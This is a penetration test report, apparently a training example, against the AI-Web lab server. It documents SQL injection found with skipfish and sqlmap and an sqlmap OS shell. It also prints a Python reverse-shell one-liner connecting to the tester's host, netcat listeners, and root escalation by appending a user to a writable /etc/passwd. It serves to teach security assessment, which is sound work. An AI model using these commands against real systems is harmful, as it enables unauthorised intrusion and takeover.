Table of Contents

EXECUTIVE SUMMARY ........................................................... 3

SYNOPSIS ......................................................................... 3
FINDINGS OVERVIEW .................................................... 3
RECOMMENDATIONS ................................................... 3
SEVERITY SCALE ............................................................ 4
FINAL REPORT ........................................................................ 5
METHODOLOGY ............................................................. 5
INFORMATION GATHERING ........................................ 5
ENUMERATION ................................................................ 5
VULNERABILITY ASSESSMENT ................................ 10
EXPLOITATION .............................................................. 14
OTHER ISSUES: .......................................................... 23
HOUSE CLEANING .................................................... 25

2
SYNOPSIS
ITProTV was recruited to evaluate AI-Web’s security by engaging in a 1-day penetration test that was
conducted on March 4th, 2020. The goal of the “pentest” is to act as a threat-actor by performing
cyber-attacks against AI-Web’s corporate server. This will serve to discover any present vulnerabilities
that could result in a breach and be leveraged to access AI-Web’s sensitive data by a real-world
attacker. All issues discovered by ITProTV are achieved and verified through network evaluation,
system vulnerability scanning and assessment, and both automated and manual exploitation (where
applicable) of found vulnerabilities.

FINDINGS OVERVIEW
While conducting the external penetration test, there were several critical vulnerabilities discovered in
the AI-Web network. ITProTV was able to gain full administrative privilege to the AIWEB1 corporate
server. This was possible due to a vulnerable web-application, which led to remote system access,
then full administrative control was gained through improperly set permissions to a critical system file.
A brief technical overview is listed below:

o Target: AIWEB1 – Low-privilege shell was obtained by performing a SQL Injection attack
against AI-Web’s web-app ‘se3reTdir777’ found at URL: http://10.10.10.4/se3reTdir777/ ,
granting ITProTV testers access as the HTTP service account ‘www-data’. Once access
was established, privilege escalation was possible due to the write permissions of ‘www-
data’; allowing the creation a new administrative user (‘user1’) to the ‘/etc/passwd’ file,
after which, the testers could issue the command ‘su user1’ and provide the password of
‘password’ giving them full root access.

RECOMMENDATIONS
To increase the security posture of AI-Web, ITProTV recommends the following mitigations and/or
remediations be performed:

o Implement Prepared Statements with Parameterized Queries. Injection attacks remains

the most common attacks leveraged against web applications. One of the most effective
mitigation strategies for preventing SQL Injection attacks is the implementation of
Prepared Statements with Parameterized Queries.

3
 o Implement User Input Whitelisting. Another very useful mitigation against SQL Injection
attacks is to validate the supplied user input. One should never trust that user input is safe
and therefore should be checked for a set of disallowed characters.
o Require Secure Coding Training for Developers. Developers are on the front lines of
security for any organization and should be prepared to be the first line of defense.
Training in secure coding techniques and practices will help ensure that your
organization’s applications are developed using the most secure code possible, thus
reducing your attack-surface and lowering your overall risk.
o Implement Network Security Devices. Putting up a few fences can go a long way to
increasing your security posture and is a key piece of the Defense-in-Depth puzzle. By
adding a Web Application Firewall (WAF), Next-Gen Firewall, and/or Intrusion
Detection/Prevention System, you can significantly increase your ability to stop intruders
from accessing your systems.
o Perform Permissions Audit of System Files. Permissions misconfigurations are a
common occurrence and can be leveraged to gain full administrative. Performing a
baseline and then scheduled audits of the permissions to system files can ensure those
files and their permissions are following security best-practices. Service accounts should
not be owners of sensitive operating system files that control local user-accounts.

SEVERITY SCALE

CRITICAL Severity Issue: Poses immediate danger to systems, network, and/or data security and
should be addressed as soon as possible. Exploitation requires little to no special knowledge of the
target. Exploitation doesn’t require highly advanced skill, training, or tools.

HIGH Severity Issue: Poses significant danger to systems, network, and/or data security. Exploitation
commonly requires some advanced knowledge, training, skill, and/or tools. Issue(s) should be
addressed promptly.

MEDIUM Severity Issue: Vulnerabilities should be addressed in a timely manner. Exploitation is

usually more difficult to achieve and requires special knowledge or access. Exploitation may also
require social engineering as well as special conditions.

LOW Severity Issue: Danger of exploitation is unlikely as vulnerabilities offer little to no opportunity to
compromise system, network, and/or data security. Can be handled as time permits.

INFORMATIONAL Issue: Meant to increase client’s knowledge. Likely no actual threat.

4
METHODOLOGY

ITProTV penetration testers employed testing methods that are widely adopted in the cyber security
assessment industry. This includes 5 phases: Information Gathering, Enumeration, Vulnerability
Assessment, Exploitation, and Reporting/Mitigation.

During these phases, both automated and manual audit techniques to insure the best possible results.

INFORMATION GATHERING

ITProTV was given a scope of host(s) from AI-Web that includes the AI-Web corporate server. You can
see the network details of that device listed below:

- Hostname: AIWEB1
- IP Address: 10.10.10.4
- MAC Address: 00:0C:29:87:86:E3

ITProTV testers were able to verify the IP address and connectivity of the AIWEB1 host/server by
connecting to the AI-Web network and performing a ping-sweep of the network which returned the IP
Address of 10.10.10.4 for AIWEB1.

ENUMERATION

ITProTV performed service enumeration to discover information about the services provided by
AIWEB1 that reveal may critical details that could be leveraged to bypass security and gain an initial
foothold into the system.

5
ITProTV testers began by scanning all ports on AIWEB1 with Nmap to determine which services were
open. *In some cases, some ports may not be listed

The initial Nmap scan discovered that only TCP port 80 is open on target AIWEB1. Testers then
performed a more focused Nmap scan to gather more detailed information.

6
The detailed Nmap scan revealed that a ‘robots.txt’ file is being used to hide 2 directories from
search engine crawlers. A manual browsing of this file verifies this finding.

Further enumeration, both automated and manual, revealed more sensitive data that proved to be
crucial to gaining database and system access.

Directory fuzzing results of ‘/m3diNf0/’ web directory using GoBuster.

Directory fuzzing revealed nothing about immediately useful from the ‘/se3reTdir777/uploads/’ web
directory.

7
Directory fuzzing results of ‘/se3reTdir77/’ web directory using GoBuster.

Testers were then able to browse to these web pages to gain more information.

http://10.10.10.4/m3diNf0/info.php

8
http://10.10.10.4/se3reTdir777/index.php

9
VULNERABILITY ASSESSMENT

The vulnerability assessment is done in an attempt to verify that a vulnerability exists that may be
exploitable by an attacker. It was at this time that ITProTV testers employed a variety of web
application vulnerability scanners, such as Skipfish and SQLMap, which were successful at
discovering an exploitable vulnerability (SQL Injection). This vulnerability was then leveraged by
testers to gain initial system access.

Vulnerability Exploited: SQL Injection

Vulnerability Explanation: SQL injection attacks occur when a web application does not perform any
validation against the values received from objects like web forms, user input parameters, cookies,
etc., before passing them to SQL queries that are to be executed on a database server. This
facilitates a way for an attacker to manipulate the input so that the data is interpreted as a part of the
code instead of user supplied data.

Vulnerability Mitigation: Instantiate the use of Prepared Statements with Parameterized Queries.

o OWASP Parameterization Cheat Sheet

o OWASP SQL Injection Prevention Cheat Sheet

Severity: CRITICAL

Vulnerability Assessment Steps:

ITProTV testers scanned for security vulnerabilities by first utilizing the web-app vulnerability scanning
tool, Skipfish.

root@kali:~/# skipfish -o ./skipfish_report_aiweb1_se3reTdir777 http://10.10.10.4/se3reTdir777/

The results are saved in the given directory path and can then viewed by opening the generated
‘index.html’ with a web browser of choice.

10
To see more detail about the issues presented, click on the issue then click on the ‘[ show trace + ]’
link.

11
From here we can see the data passed by Skipfish to the AIWEB1 web application as well as the
response sent back, which indicates vulnerability to Error-Based SQL Injection attacks.

The Skipfish trace report shows that the scanner sent a request of ‘uid=1 ‘ “&Operation=Submit’
and the server returned a SQL syntax error pointing to where the error might have occurred.

It was at this point that testers manually confirmed the vulnerability.

12
The vulnerability scanner SQLMap was also used to verify, the found SQL Injection vulnerability and
enumerate the database name.

root@kali:~# sqlmap -u http://10.10.10.4/se3reTdir777/ --data=”uid=1&Operation=Submit” –dbs

ITProTV testers are now ready to move on to the next phase of testing.

13
EXPLOITATION

In the Exploitation phase, ITProTV testers will attempt to exploit found vulnerabilities within your
operating system, applications, and data. The end goal for the tester is to attempt to penetrate into
the target environment, gaining as much privilege as possible, and avoiding detection while doing so.

All testers will stay within the scope that was determined during pre-engagement activities and
documentation.

Gaining Low-Privilege Shell

The ITProTV testers succeeded in gaining Remote Code Execution (RCE) by leveraging the
discovered SQL Injection vulnerability chaining together SQLMap, Linux Bash commands, and Python
commands.

Testers begin exploitation by further enumeration of the AIWEB1 MySQL database.

Enumerating TABLE data:

Dumping data for TABLE ‘user’:

14
Dumping data for TABLE ‘systemUser’:

3 user accounts are discovered with Base64 encoded passwords. The passwords are decoded, and
the credentials are recorded.

1. t00r : FakeUserPassw0rd
2. aiweb1pwn : MyEvilPass_f908sdaf9_sadfasf0sa
3. u3er : N0tThis0neAls0

15
Low-Privilege Shell Access via SQLMap:

root@kali:~# sqlmap -u http://10.10.10.4/se3reTdir777/ --data=”uid=1&Operation=Submit” –os-shell

The ITProTV testers now have verified RCE on AIWEB1 and now will attempt to obtain a fully
interactive TTY shell. This is desired for 2 reasons:

1. The SQLMap shell isn’t always returning command output consistently

2. The SQLMap shell doesn’t work well with commands like cd, sudo, su, etc.

Testers took the following steps to reach this goal…

Testers then checked to see if Python was installed:

16
Testers then start a listener to catch the incoming connection with Netcat on their Kali Linux system:

root@kali:~# ncat -vnlp 9999

Using the SQLMap shell and Python, testers then execute a new shell connection from AIWEB1 to the
tester’s Kali Linux Netcat listener.

os-shell> python -c "exec(\"import socket, subprocess;s =

socket.socket();s.connect(('10.10.10.3',9999))\nwhile 1: proc =
subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"

Connection is successfully made to Kali from AIWEB1. The new shell is much more stable and
consistent, but still isn’t a fully interactive TTY shell. To obtain the desired TTY, one more shell
connection will need to be made.

In a new terminal session, testers start another Netcat listener over TCP port 8888 on their Kali Linux
system…

root@kali:~# ncat -vnlp 8888

…and issue the following Bash one-liner from the previous Python shell terminal session:

17
Connection is successfully made to new terminal session and Python is used to create fully interactive
TTY shell:

Now that a fully interactive TTY shell session had been established, ITProTV testers began the
process of looking for a way to elevate privileges. Through manual exploration of system files, a
vulnerability was discovered that allowed testers to gain full administrative/root privileges to the
AIWEB1 server.

Gaining full root access:

After checking file permissions for many common system files, testers quick discovered a permissions
misconfiguration for the ‘/etc/passwd’ file.

Since ITProTV testers had gained access through the ‘www-data’ service account, they found
themselves with ownership and write permissions to the ‘/etc/passwd’ file. This allowed them to
create a new user account entry with root privileges and a password of their choice.

This was accomplished using the following steps.

18
From terminal in Kali, ITProTV testers created a SHA-512 hashed password of ‘password’:

From terminal in Kali, testers then created a text file containing the required fields for a user account
entry in a standard /etc/passwd file.

This file (user1.passwd) contains all the information to login as ‘user1’ with password of ‘password’.

From terminal in Kali, testers use Python to serve the user1.passwd file with HTTP.

From the shell connection to AIWEB1, testers downloaded the ‘user1.passwd’ file using the ‘curl’
command, saving the file to the ‘/tmp’ directory of AIWEB1.

19
ITProTV testers were then able to append the contents of the ‘user1.passwd’ file into the
‘/etc/passwd’ file.

20
At this point, ITProTV testers were able to login with the ‘user1’ account and were granted root
privileges to the AIWEB1 server.

ITProTV testers then used their root privileges to access privileged files that contain sensitive data.
These were the ‘/root/flag.txt’ and ‘/etc/shadow’ files.

21
22
OTHER ISSUES

ITProTV testers were able to login with the ‘aiweb1pwn’ account password discovered in the
enumeration of the MySQL database.

Severity: LOW

23
ITProTV testers discovered login credentials for the MySQL database which allowed a successful
local login to said database.

Severity: LOW

24
HOUSE CLEANING

During a penetration testing engagement, tools, files, user accounts, etc., are created on the client’s
system(s) which would compromise the client’s security.

ITProTV is diligent to ensure that no potential security issues are introduced to AI-Web’s environment
through remnants left on their system(s) after the completion of the engagement. AI-Web system(s)
have had all tools, files, user accounts, etc. that were created by ITProTV testers during the
engagement removed.

25